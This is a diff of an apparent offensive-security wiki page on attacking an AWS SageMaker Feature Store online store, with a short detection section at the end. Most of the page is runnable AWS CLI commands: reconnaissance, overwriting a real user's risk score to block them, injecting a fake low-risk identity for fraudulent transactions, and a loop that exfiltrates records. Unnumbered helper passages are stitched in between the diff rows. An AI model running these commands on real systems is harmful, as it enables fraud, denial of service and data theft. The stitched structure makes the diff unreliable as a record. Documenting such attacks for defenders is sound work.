1 | 1 | # SageMaker Feature Store online store poisoning |
2 | 2 |
3 | | -Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints. |
| 3 | +Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can also read and exfiltrate sensitive feature values. The attack requires no access to models or endpoints: it operates directly on the data layer. |
4 | 4 |
5 | 5 | ## Requirements |
6 | 6 | - Permissions: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord` |
7 | 7 | - Target: Feature Group with OnlineStore enabled (typically backing real-time inference) |
| 8 | +- Complexity: **LOW** - Simple AWS CLI commands, no model manipulation required |
8 | 9 |
9 | 10 | ## Steps |
10 | | -1) Pick or create a small Online Feature Group for testing |
| 11 | + |
| 12 | +### Reconnaissance |
| 13 | + |
| 14 | +1) List Feature Groups (the list summary does not include `OnlineStoreConfig`, so confirm OnlineStore is enabled in the next step) |
| 15 | +```bash |
| 16 | +REGION=${REGION:-us-east-1} |
| 17 | +aws sagemaker list-feature-groups \ |
| 18 | + --region $REGION \ |
| 19 | + --query "FeatureGroupSummaries[].[FeatureGroupName,FeatureGroupStatus,CreationTime]" \ |
| 20 | + --output table |
| 21 | +``` |
| 22 | + |
| 23 | +2) Describe a target Feature Group to confirm OnlineStore is enabled and to understand its schema |
| 24 | +```bash |
| 25 | +FG=<feature-group-name> |
| 26 | +aws sagemaker describe-feature-group \ |
| 27 | + --region $REGION \ |
| 28 | + --feature-group-name "$FG" |
| 29 | +``` |
| 30 | + |
| 31 | +Note the `RecordIdentifierFeatureName`, `EventTimeFeatureName`, and all feature definitions. These are required for crafting valid records. |
| 32 | + |
| 33 | +### Attack Scenario 1: Data Poisoning (Overwrite Existing Records) |
| 34 | + |
| 35 | +1) Read the current legitimate record |
| 36 | +```bash |
| 37 | +aws sagemaker-featurestore-runtime get-record \ |
| 38 | + --region $REGION \ |
| 39 | + --feature-group-name "$FG" \ |
| 40 | + --record-identifier-value-as-string user-001 |
| 41 | +``` |
| 42 | + |
| 43 | +2) Poison the record with malicious values using the inline `--record` parameter |
| 44 | +```bash |
| 45 | +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) |
| 46 | + |
| 47 | +# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user |
| 48 | +aws sagemaker-featurestore-runtime put-record \ |
| 49 | + --region $REGION \ |
| 50 | + --feature-group-name "$FG" \ |
| 51 | + --record "[ |
| 52 | + {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"}, |
| 53 | + {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"}, |
| 54 | + {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"}, |
| 55 | + {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"}, |
| 56 | + {\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"} |
| 57 | + ]" \ |
| 58 | + --target-stores OnlineStore |
| 59 | +``` |
| 60 | + |
| 61 | +3) Verify the poisoned data |
| 62 | +```bash |
| 63 | +aws sagemaker-featurestore-runtime get-record \ |
| 64 | + --region $REGION \ |
| 65 | + --feature-group-name "$FG" \ |
| 66 | + --record-identifier-value-as-string user-001 |
| 67 | +``` |
| 68 | + |
| 69 | +**Impact**: ML models consuming this feature will now see `risk_score=0.99` for a legitimate user, potentially blocking their transactions or services. |
| 70 | + |
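Hand-escaping the JSON passed to `--record` is easy to get wrong. The following is a minimal sketch of one way to assemble the payload, assuming the example schema above (`entity_id`, `event_time`, `risk_score`). The helper name `build_record` is hypothetical, the other example features are left out for brevity, and the values are assumed to contain no quotes or backslashes, since no JSON escaping is performed.

```bash
# Hypothetical helper (not part of the AWS CLI): print a --record payload
# for the example schema. Values are inserted verbatim, so they must not
# contain double quotes or backslashes.
build_record() {
  local entity_id="$1" event_time="$2" risk_score="$3"
  printf '[{"FeatureName":"entity_id","ValueAsString":"%s"},' "$entity_id"
  printf '{"FeatureName":"event_time","ValueAsString":"%s"},' "$event_time"
  printf '{"FeatureName":"risk_score","ValueAsString":"%s"}]\n' "$risk_score"
}

# Same timestamp format as in the put-record example
NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
RECORD=$(build_record user-001 "$NOW" 0.99)
echo "$RECORD"

# The payload could then be passed to the same put-record call:
# aws sagemaker-featurestore-runtime put-record --region "$REGION" \
#   --feature-group-name "$FG" --record "$RECORD" --target-stores OnlineStore
```

Building the string with single-quoted `printf` templates keeps the JSON readable and avoids the backslash escaping needed inside a double-quoted shell argument.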
| 71 | +### Attack Scenario 2: Malicious Data Injection (Create Fraudulent Records) |
| 72 | + |
| 73 | +Inject completely new records with manipulated features to evade security controls: |
| 74 | + |
| 75 | +```bash |
| 76 | +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) |
| 77 | + |
| 78 | +# Create fake user with artificially low risk to perform fraudulent transactions |
| 79 | +aws sagemaker-featurestore-runtime put-record \ |
| 80 | + --region $REGION \ |
| 81 | + --feature-group-name "$FG" \ |
| 82 | + --record "[ |
| 83 | + {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"}, |
| 84 | + {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"}, |
| 85 | + {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"}, |
| 86 | + {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"}, |
| 87 | + {\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"} |
| 88 | + ]" \ |
| 89 | + --target-stores OnlineStore |
| 90 | +``` |
| 91 | + |
| 92 | +Verify the injection: |
| 93 | +```bash |
| 94 | +aws sagemaker-featurestore-runtime get-record \ |
| 95 | + --region $REGION \ |
| 96 | + --feature-group-name "$FG" \ |
| 97 | + --record-identifier-value-as-string user-999 |
| 98 | +``` |
| 99 | + |
| 100 | +**Impact**: Attacker creates a fake identity with a low risk score (0.01) that can perform high-value fraudulent transactions without triggering fraud detection. |
| 101 | + |
| 102 | +### Attack Scenario 3: Sensitive Data Exfiltration |
| 103 | + |
| 104 | +Read multiple records to extract confidential features and profile model behavior: |
| 105 | + |
| 106 | +```bash |
| 107 | +# Exfiltrate data for known users |
| 108 | +for USER_ID in user-001 user-002 user-003 user-999; do |
| 109 | + echo "Exfiltrating data for ${USER_ID}:" |
| 110 | + aws sagemaker-featurestore-runtime get-record \ |
| 111 | + --region $REGION \ |
| 112 | + --feature-group-name "$FG" \ |
| 113 | + --record-identifier-value-as-string "${USER_ID}" |
| 114 | +done |
| 115 | +``` |
| 116 | + |
| 117 | +**Impact**: Confidential features (risk scores, transaction patterns, personal data) are exposed to the attacker. |
| 118 | + |
| 119 | +### Testing/Demo Feature Group Creation (Optional) |
| 120 | + |
| 121 | +If you need to create a test Feature Group: |
| 122 | + |
11 | 123 | ```bash |
12 | 124 | REGION=${REGION:-us-east-1} |
13 | 125 | FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text) |
14 | 126 | if [ -z "$FG" -o "$FG" = "None" ]; then |
15 | 127 | ACC=$(aws sts get-caller-identity --query Account --output text) |
16 | | - FG=ht-fg-$ACC-$(date +%s) |
| 128 | + FG=test-fg-$ACC-$(date +%s) |
17 | 129 | ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole) |
18 | | - aws sagemaker create-feature-group --region $REGION --feature-group-name "$FG" --record-identifier-feature-name entity_id --event-time-feature-name event_time --feature-definitions "[{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}]" --online-store-config "{\"EnableOnlineStore\":true}" --role-arn "$ROLE_ARN" |
| 130 | + |
| 131 | + aws sagemaker create-feature-group \ |
| 132 | + --region $REGION \ |
| 133 | + --feature-group-name "$FG" \ |
| 134 | + --record-identifier-feature-name entity_id \ |
| 135 | + --event-time-feature-name event_time \ |
| 136 | + --feature-definitions "[ |
| 137 | + {\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"}, |
| 138 | + {\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"}, |
| 139 | + {\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}, |
| 140 | + {\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"}, |
| 141 | + {\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"} |
| 142 | + ]" \ |
| 143 | + --online-store-config "{\"EnableOnlineStore\":true}" \ |
| 144 | + --role-arn "$ROLE_ARN" |
| 145 | + |
19 | 146 | echo "Waiting for feature group to be in Created state..." |
20 | 147 | for i in $(seq 1 40); do |
21 | 148 | ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true) |
22 | | - echo $ST; [ "$ST" = "Created" ] && break; sleep 15 |
| 149 | + echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15 |
23 | 150 | done |
24 | 151 | fi |
25 | | -``` |
26 | 152 |
27 | | -2) Insert/overwrite an online record (poison) |
28 | | -```bash |
29 | | -NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) |
30 | | -cat > /tmp/put.json << JSON |
31 | | -{ |
32 | | - "FeatureGroupName": "$FG", |
33 | | - "Record": [ |
34 | | - {"FeatureName": "entity_id", "ValueAsString": "user-123"}, |
35 | | - {"FeatureName": "event_time", "ValueAsString": "$NOW"}, |
36 | | - {"FeatureName": "risk_score", "ValueAsString": "0.99"} |
37 | | - ], |
38 | | - "TargetStores": ["OnlineStore"] |
39 | | -} |
40 | | -JSON |
41 | | -aws sagemaker-featurestore-runtime put-record --region $REGION --cli-input-json file:///tmp/put.json |
| 153 | +echo "Feature Group ready: $FG" |
42 | 154 | ``` |
43 | 155 |
44 | | -3) Read back the record to confirm manipulation |
45 | | -```bash |
46 | | -aws sagemaker-featurestore-runtime get-record --region $REGION --feature-group-name "$FG" --record-identifier-value-as-string user-123 --feature-name risk_score --query "Record[0].ValueAsString" |
47 | | -``` |
48 | 156 |
49 | | -Expected: risk_score returns 0.99 (attacker-set), proving ability to change online features consumed by models. |
| 157 | +## Detection |
| 158 | + |
| 159 | +Monitor CloudTrail for suspicious patterns: |
| 160 | +- `PutRecord` events from unusual IAM principals or IP addresses |
| 161 | +- High-frequency `PutRecord` or `GetRecord` calls |
| 162 | +- `PutRecord` with anomalous feature values (e.g., risk_score outside normal range) |
| 163 | +- Bulk `GetRecord` operations indicating mass exfiltration |
| 164 | +- Access outside normal business hours or from unexpected locations |
| 165 | + |
| 166 | +Implement anomaly detection: |
| 167 | +- Feature value validation (e.g., risk_score must be 0.0-1.0) |
| 168 | +- Write pattern analysis (frequency, timing, source identity) |
| 169 | +- Data drift detection (sudden changes in feature distributions) |
50 | 170 |
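The feature value validation listed under Detection can be sketched as a small shell check. This is only an illustration under stated assumptions: the helper name `is_valid_risk_score` is hypothetical, and the valid range of 0.0 to 1.0 is taken from the example in the list, not from any real schema.

```bash
# Hypothetical helper: succeed only if the value is a plain decimal in [0.0, 1.0].
is_valid_risk_score() {
  local value="$1"
  # Reject empty input, non-numeric characters, multiple dots, or a lone dot
  case "$value" in
    ''|*[!0-9.]*|*.*.*|.) return 1 ;;
  esac
  # Compare numerically with awk, since shell arithmetic is integer-only
  awk -v v="$value" 'BEGIN { exit !(v + 0 >= 0 && v + 0 <= 1) }'
}

# Check a few candidate values before they would be written
for v in 0.15 0.99 1.5 POISONED; do
  if is_valid_risk_score "$v"; then
    echo "$v: ok"
  else
    echo "$v: rejected"
  fi
done
```

Note that the poisoned value `0.99` from Attack Scenario 1 is within range and passes this check, so range validation alone would not catch that attack. It needs to be paired with the write pattern analysis and drift detection listed above.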
51 | | -## Impact |
52 | | -- Real-time integrity attack: manipulate features used by production models without touching endpoints/models. |
53 | | -- Confidentiality risk: read sensitive features via GetRecord from OnlineStore. |
| 171 | +## References |
| 172 | +- [AWS SageMaker Feature Store Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store.html) |
| 173 | +- [Feature Store Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-security.html) |